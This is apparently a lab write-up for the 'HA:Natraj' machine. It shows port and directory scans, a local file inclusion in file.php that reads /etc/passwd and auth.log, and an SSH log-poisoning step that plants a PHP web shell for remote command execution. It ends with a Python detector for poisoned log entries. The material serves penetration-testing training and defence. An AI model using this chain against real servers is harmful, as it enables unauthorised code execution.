PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
| 256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_ 256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open tcpwrapped
|_http-title: HA:Natraj
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.80 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/console (Status: 301) [Size: 318] [--> <http://192.168.125.80/console/>]
/images (Status: 301) [Size: 317] [--> <http://192.168.125.80/images/>]
/index.html (Status: 200) [Size: 14497]
/server-status (Status: 403) [Size: 279]
The /console directory caught my attention, so I will do a quick fuzz there on the parameter name.
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster fuzz -u <http://192.168.125.80/console/file.php?FUZZ=/etc/passwd> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0
Found: [Status=200] [Length=1398] <http://192.168.125.80/console/file.php?file=/etc/passwd>
Bingo
As we have the users mahakal and natraj, let's check if either has a .ssh key, but no luck.
And thinking back, it is an Apache server, so perhaps we can check /var/log/auth.log?
<http://192.168.125.80/console/file.php?file=/var/log/auth.log>
And yes, we have access to /var/log/auth.log through the same file parameter.
We tried to perform an SSH log poisoning attack to get RCE (Remote Command Execution): sshd writes the supplied username into auth.log verbatim, and the file parameter then includes that log as PHP.
┌──(kali㉿VirtualBox)-[~]
└─$ ssh '<?php system($_GET['cmd']); ?>'@192.168.125.80
Then back to the URL, we can append &cmd=id at the end to check if we succeeded:
<http://192.168.125.80/console/file.php?file=/var/log/auth.log&cmd=id>
Seems like we did it
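The poisoning step above leaves a trace a defender can alert on: sshd records the attacker-chosen username in auth.log as-is, and only a file-inclusion bug turns that line into executable code. As an added example that is not part of the original write-up, the following Python scans constructed sample auth.log lines (hostnames, PIDs and addresses are made up) for sshd username fields carrying script markers, which is the detection signal for this technique.

```python
import re

# Constructed sample of /var/log/auth.log lines (not taken from the original page).
SAMPLE_AUTH_LOG = """\
Jun  6 10:12:01 natraj sshd[1301]: Accepted publickey for mahakal from 192.168.125.10 port 50122 ssh2: RSA SHA256:placeholder
Jun  6 10:12:44 natraj sshd[1320]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.125.20 port 51014
Jun  6 10:12:46 natraj sshd[1320]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 192.168.125.20 port 51014 ssh2
Jun  6 10:13:02 natraj sshd[1333]: Invalid user admin from 192.168.125.21 port 51020
"""

# Markers that a script engine would execute if the log file were later
# pulled in by an include() driven by a user-supplied path.
POISON_MARKERS = ("<?php", "<?=", "<script", "<%")

# sshd message forms that echo the client-supplied username verbatim.
USER_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: (?:Invalid user|Failed password for invalid user) "
    r"(?P<user>.*?) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)


def find_poisoned_entries(log_text):
    """Return (line_no, source_ip, username) for every sshd entry whose
    username field contains a marker an include could interpret as code."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = USER_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        if any(marker in user for marker in POISON_MARKERS):
            hits.append((line_no, m.group("src"), user))
    return hits


def sources_by_hit_count(hits):
    """Aggregate hits per source address so an analyst can prioritise."""
    counts = {}
    for _, src, _ in hits:
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    for line_no, src, user in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: poisoned username from {src}: {user!r}")
```

A hit on its own is a low-cost indicator; paired with web-server access logs showing the same host requesting the log path through a file parameter, it confirms the inclusion step.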